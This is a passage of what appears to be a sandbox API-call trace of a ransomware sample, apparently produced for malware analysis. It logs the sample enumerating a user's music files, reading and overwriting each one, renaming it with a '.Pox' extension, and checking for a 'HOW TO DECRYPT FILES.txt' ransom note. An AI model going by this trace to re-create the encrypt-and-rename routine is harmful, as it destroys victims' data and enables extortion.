lpFindFileData=0x3ae268*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x62f5d420, ftCreationTime.dwHighDateTime=0x1d4c58f, ftLastAccessTime.dwLowDateTime=0xdb9f4c20, ftLastAccessTime.dwHighDateTime=0x1d4cb71, ftLastWriteTime.dwLowDateTime=0xdb9f4c20, ftLastWriteTime.dwHighDateTime=0x1d4cb71, nFileSizeHigh=0x0, nFileSizeLow=0x3302, dwReserved0=0x0, dwReserved1=0x0, cFileName="xN9vk HnnX26wwbtMhY.wav", cAlternateFileName="XN9VKH~1.WAV")) returned 0 [0041.118] FindClose (in: hFindFile=0x4061c8 | out: hFindFile=0x4061c8) returned 1 [0041.118] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4f0) returned 1 [0041.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae4fc) returned 1 [0041.119] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\IdggPsA8JrqU.mp3", nBufferLength=0x105, lpBuffer=0x3adee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\IdggPsA8JrqU.mp3", lpFilePart=0x0) returned 0x50 [0041.119] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3d4) returned 1 [0041.119] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\IdggPsA8JrqU.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\idggpsa8jrqu.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.119] GetFileType (hFile=0x26c) returned 0x1 [0041.119] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3d0) returned 1 [0041.119] GetFileType (hFile=0x26c) returned 0x1 [0041.119] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae4dc | out: lpFileSizeHigh=0x3ae4dc*=0x0) returned 0x2776 [0041.120] ReadFile (in: hFile=0x26c, lpBuffer=0x258cb98, nNumberOfBytesToRead=0x2776, lpNumberOfBytesRead=0x3ae488, lpOverlapped=0x0 | out: lpBuffer=0x258cb98*, lpNumberOfBytesRead=0x3ae488*=0x2776, lpOverlapped=0x0) returned 1 [0041.120] CloseHandle (hObject=0x26c) returned 1 [0041.134] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.134] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae454) returned 1 [0041.134] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4d0 | out: lpFileInformation=0x3ae4d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.135] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae450) returned 1 [0041.135] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\IdggPsA8JrqU.mp3", nBufferLength=0x105, lpBuffer=0x3adecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\IdggPsA8JrqU.mp3", lpFilePart=0x0) returned 0x50 [0041.135] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3c0) returned 1 [0041.135] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\IdggPsA8JrqU.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\idggpsa8jrqu.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.136] GetFileType (hFile=0x26c) returned 0x1 [0041.136] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3bc) returned 1 [0041.136] GetFileType (hFile=0x26c) returned 0x1 [0041.136] WriteFile (in: hFile=0x26c, lpBuffer=0x25e5f04*, nNumberOfBytesToWrite=0x2780, lpNumberOfBytesWritten=0x3ae47c, lpOverlapped=0x0 | out: lpBuffer=0x25e5f04*, lpNumberOfBytesWritten=0x3ae47c*=0x2780, lpOverlapped=0x0) returned 1 [0041.137] CloseHandle (hObject=0x26c) returned 1 [0041.137] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\IdggPsA8JrqU.mp3", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\IdggPsA8JrqU.mp3", lpFilePart=0x0) returned 0x50 [0041.137] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\IdggPsA8JrqU.mp3.Pox", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\IdggPsA8JrqU.mp3.Pox", lpFilePart=0x0) returned 0x54 [0041.137] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae460) returned 1 [0041.137] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\IdggPsA8JrqU.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\idggpsa8jrqu.mp3"), fInfoLevelId=0x0, lpFileInformation=0x3ae4dc | out: lpFileInformation=0x3ae4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xa5f030d0, ftCreationTime.dwHighDateTime=0x1d4d3ff, ftLastAccessTime.dwLowDateTime=0x7549fac0, ftLastAccessTime.dwHighDateTime=0x1d4d403, ftLastWriteTime.dwLowDateTime=0x2ab359c0, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0x2780)) returned 1 [0041.138] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae45c) returned 1 [0041.138] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\IdggPsA8JrqU.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\idggpsa8jrqu.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\IdggPsA8JrqU.mp3.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\idggpsa8jrqu.mp3.pox")) returned 1 [0041.138] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\r3c9is99-0a.mp3", nBufferLength=0x105, lpBuffer=0x3adee0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\r3c9is99-0a.mp3", lpFilePart=0x0) returned 0x4f [0041.138] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3d4) returned 1 [0041.138] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\r3c9is99-0a.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\r3c9is99-0a.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.138] GetFileType (hFile=0x26c) returned 0x1 [0041.139] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3d0) returned 1 [0041.139] GetFileType (hFile=0x26c) returned 0x1 [0041.139] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae4dc | out: lpFileSizeHigh=0x3ae4dc*=0x0) returned 0xad9e [0041.139] ReadFile (in: hFile=0x26c, lpBuffer=0x25e8cd4, nNumberOfBytesToRead=0xad9e, lpNumberOfBytesRead=0x3ae488, lpOverlapped=0x0 | out: lpBuffer=0x25e8cd4*, lpNumberOfBytesRead=0x3ae488*=0xad9e, lpOverlapped=0x0) returned 1 [0041.140] CloseHandle (hObject=0x26c) returned 1 [0041.155] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adff4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.155] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae454) returned 1 [0041.155] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae4d0 | out: lpFileInformation=0x3ae4d0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0)) returned 0 [0041.155] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae450) returned 1 [0041.155] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\r3c9is99-0a.mp3", nBufferLength=0x105, lpBuffer=0x3adecc, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\r3c9is99-0a.mp3", lpFilePart=0x0) returned 0x4f [0041.156] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3c0) returned 1 [0041.156] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\r3c9is99-0a.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\r3c9is99-0a.mp3"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.157] GetFileType (hFile=0x26c) returned 0x1 [0041.157] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae3bc) returned 1 [0041.157] GetFileType (hFile=0x26c) returned 0x1 [0041.158] WriteFile (in: hFile=0x26c, lpBuffer=0x26563b4*, nNumberOfBytesToWrite=0xada0, lpNumberOfBytesWritten=0x3ae47c, lpOverlapped=0x0 | out: lpBuffer=0x26563b4*, lpNumberOfBytesWritten=0x3ae47c*=0xada0, lpOverlapped=0x0) returned 1 [0041.159] CloseHandle (hObject=0x26c) returned 1 [0041.160] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\r3c9is99-0a.mp3", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\r3c9is99-0a.mp3", lpFilePart=0x0) returned 0x4f [0041.160] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\r3c9is99-0a.mp3.Pox", nBufferLength=0x105, lpBuffer=0x3ae000, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\r3c9is99-0a.mp3.Pox", lpFilePart=0x0) returned 0x53 [0041.160] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae460) returned 1 [0041.160] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\r3c9is99-0a.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\r3c9is99-0a.mp3"), fInfoLevelId=0x0, lpFileInformation=0x3ae4dc | out: lpFileInformation=0x3ae4dc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x54db45f0, ftCreationTime.dwHighDateTime=0x1d4ce7c, ftLastAccessTime.dwLowDateTime=0x1f7fd630, ftLastAccessTime.dwHighDateTime=0x1d4d2a7, ftLastWriteTime.dwLowDateTime=0x2ab81c80, ftLastWriteTime.dwHighDateTime=0x1d53803, nFileSizeHigh=0x0, nFileSizeLow=0xada0)) returned 1 [0041.160] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae45c) returned 1 [0041.160] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\r3c9is99-0a.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\r3c9is99-0a.mp3"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\r3c9is99-0a.mp3.Pox" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\r3c9is99-0a.mp3.pox")) returned 1 [0041.161] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0041.161] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx", nBufferLength=0x105, lpBuffer=0x3adfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx", lpFilePart=0x0) returned 0x4d [0041.161] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx\\", nBufferLength=0x105, lpBuffer=0x3adf98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx\\", lpFilePart=0x0) returned 0x4e [0041.161] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx\\*", lpFindFileData=0x3ae1e4 | out: lpFindFileData=0x3ae1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa76aa6f0, ftCreationTime.dwHighDateTime=0x1d4d46f, ftLastAccessTime.dwLowDateTime=0x71983ac0, ftLastAccessTime.dwHighDateTime=0x1d4cf8c, ftLastWriteTime.dwLowDateTime=0x71983ac0, ftLastWriteTime.dwHighDateTime=0x1d4cf8c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405d88 [0041.161] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa76aa6f0, ftCreationTime.dwHighDateTime=0x1d4d46f, ftLastAccessTime.dwLowDateTime=0x71983ac0, ftLastAccessTime.dwHighDateTime=0x1d4cf8c, ftLastWriteTime.dwLowDateTime=0x71983ac0, ftLastWriteTime.dwHighDateTime=0x1d4cf8c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.161] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd246010, ftCreationTime.dwHighDateTime=0x1d4c6f2, ftLastAccessTime.dwLowDateTime=0x2269ba70, ftLastAccessTime.dwHighDateTime=0x1d4c909, ftLastWriteTime.dwLowDateTime=0x2269ba70, ftLastWriteTime.dwHighDateTime=0x1d4c909, nFileSizeHigh=0x0, nFileSizeLow=0xff4f, dwReserved0=0x0, dwReserved1=0x0, cFileName="bq8OPOoV uHDp26ERw.mp3", cAlternateFileName="BQ8OPO~1.MP3")) returned 1 [0041.161] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46aa4300, ftCreationTime.dwHighDateTime=0x1d4c896, ftLastAccessTime.dwLowDateTime=0xae8b2680, ftLastAccessTime.dwHighDateTime=0x1d4cee3, ftLastWriteTime.dwLowDateTime=0xae8b2680, ftLastWriteTime.dwHighDateTime=0x1d4cee3, nFileSizeHigh=0x0, nFileSizeLow=0x27ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="jtGTSxSLrtKcl2V.wav", cAlternateFileName="JTGTSX~1.WAV")) returned 1 [0041.161] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64d1bf50, ftCreationTime.dwHighDateTime=0x1d4cebf, ftLastAccessTime.dwLowDateTime=0x65183ce0, ftLastAccessTime.dwHighDateTime=0x1d4d50f, ftLastWriteTime.dwLowDateTime=0x65183ce0, ftLastWriteTime.dwHighDateTime=0x1d4d50f, nFileSizeHigh=0x0, nFileSizeLow=0x1412, dwReserved0=0x0, dwReserved1=0x0, cFileName="nKZGPU0PwVE 45Rkjfo.m4a", cAlternateFileName="NKZGPU~1.M4A")) returned 1 [0041.162] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0041.162] FindClose (in: hFindFile=0x405d88 | out: hFindFile=0x405d88) returned 1 [0041.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae47c) returned 1 [0041.162] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae488) returned 1 [0041.162] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae4bc) returned 1 [0041.162] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx", nBufferLength=0x105, lpBuffer=0x3adfc4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx", lpFilePart=0x0) returned 0x4d [0041.162] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx\\", nBufferLength=0x105, lpBuffer=0x3adf98, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx\\", lpFilePart=0x0) returned 0x4e [0041.162] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx\\*", lpFindFileData=0x3ae1e4 | out: lpFindFileData=0x3ae1e4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa76aa6f0, ftCreationTime.dwHighDateTime=0x1d4d46f, ftLastAccessTime.dwLowDateTime=0x71983ac0, ftLastAccessTime.dwHighDateTime=0x1d4cf8c, ftLastWriteTime.dwLowDateTime=0x71983ac0, ftLastWriteTime.dwHighDateTime=0x1d4cf8c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x405d88 [0041.162] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xa76aa6f0, ftCreationTime.dwHighDateTime=0x1d4d46f, ftLastAccessTime.dwLowDateTime=0x71983ac0, ftLastAccessTime.dwHighDateTime=0x1d4cf8c, ftLastWriteTime.dwLowDateTime=0x71983ac0, ftLastWriteTime.dwHighDateTime=0x1d4cf8c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0041.162] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xbd246010, ftCreationTime.dwHighDateTime=0x1d4c6f2, ftLastAccessTime.dwLowDateTime=0x2269ba70, ftLastAccessTime.dwHighDateTime=0x1d4c909, ftLastWriteTime.dwLowDateTime=0x2269ba70, ftLastWriteTime.dwHighDateTime=0x1d4c909, nFileSizeHigh=0x0, nFileSizeLow=0xff4f, dwReserved0=0x0, dwReserved1=0x0, cFileName="bq8OPOoV uHDp26ERw.mp3", cAlternateFileName="BQ8OPO~1.MP3")) returned 1 [0041.162] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x46aa4300, ftCreationTime.dwHighDateTime=0x1d4c896, ftLastAccessTime.dwLowDateTime=0xae8b2680, ftLastAccessTime.dwHighDateTime=0x1d4cee3, ftLastWriteTime.dwLowDateTime=0xae8b2680, ftLastWriteTime.dwHighDateTime=0x1d4cee3, nFileSizeHigh=0x0, nFileSizeLow=0x27ab, dwReserved0=0x0, dwReserved1=0x0, cFileName="jtGTSxSLrtKcl2V.wav", cAlternateFileName="JTGTSX~1.WAV")) returned 1 [0041.162] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64d1bf50, ftCreationTime.dwHighDateTime=0x1d4cebf, ftLastAccessTime.dwLowDateTime=0x65183ce0, ftLastAccessTime.dwHighDateTime=0x1d4d50f, ftLastWriteTime.dwLowDateTime=0x65183ce0, ftLastWriteTime.dwHighDateTime=0x1d4d50f, nFileSizeHigh=0x0, nFileSizeLow=0x1412, dwReserved0=0x0, dwReserved1=0x0, cFileName="nKZGPU0PwVE 45Rkjfo.m4a", cAlternateFileName="NKZGPU~1.M4A")) returned 1 [0041.162] FindNextFileW (in: hFindFile=0x405d88, lpFindFileData=0x3ae1f4 | out: lpFindFileData=0x3ae1f4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x64d1bf50, ftCreationTime.dwHighDateTime=0x1d4cebf, ftLastAccessTime.dwLowDateTime=0x65183ce0, ftLastAccessTime.dwHighDateTime=0x1d4d50f, ftLastWriteTime.dwLowDateTime=0x65183ce0, ftLastWriteTime.dwHighDateTime=0x1d4d50f, nFileSizeHigh=0x0, nFileSizeLow=0x1412, dwReserved0=0x0, dwReserved1=0x0, cFileName="nKZGPU0PwVE 45Rkjfo.m4a", cAlternateFileName="NKZGPU~1.M4A")) returned 0 [0041.163] FindClose (in: hFindFile=0x405d88 | out: hFindFile=0x405d88) returned 1 [0041.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae47c) returned 1 [0041.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae488) returned 1 [0041.163] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx\\bq8OPOoV uHDp26ERw.mp3", nBufferLength=0x105, lpBuffer=0x3ade6c, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx\\bq8OPOoV uHDp26ERw.mp3", lpFilePart=0x0) returned 0x64 [0041.163] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae360) returned 1 [0041.163] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\_NBsFIdM9cm\\B3hXqdSEmcNd0ro\\J3JECENTIUTLx\\bq8OPOoV uHDp26ERw.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\_nbsfidm9cm\\b3hxqdsemcnd0ro\\j3jecentiutlx\\bq8opoov uhdp26erw.mp3"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x26c [0041.163] GetFileType (hFile=0x26c) returned 0x1 [0041.163] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x3ae35c) returned 1 [0041.163] GetFileType (hFile=0x26c) returned 0x1 [0041.163] GetFileSize (in: hFile=0x26c, lpFileSizeHigh=0x3ae468 | out: lpFileSizeHigh=0x3ae468*=0x0) returned 0xff4f [0041.163] ReadFile (in: hFile=0x26c, lpBuffer=0x2663d88, nNumberOfBytesToRead=0xff4f, lpNumberOfBytesRead=0x3ae414, lpOverlapped=0x0 | out: lpBuffer=0x2663d88*, lpNumberOfBytesRead=0x3ae414*=0xff4f, lpOverlapped=0x0) returned 1 [0041.164] CloseHandle (hObject=0x26c) returned 1 [0041.183] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", nBufferLength=0x105, lpBuffer=0x3adf80, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt", lpFilePart=0x0) returned 0x3e [0041.183] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x3ae3e0) returned 1 [0041.183] GetFileAttributesExW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\HOW TO DECRYPT FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\how to decrypt files.txt"), fInfoLevelId=0x0, lpFileInformation=0x3ae45c | out: lpFileInformation=0x3ae45c*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, 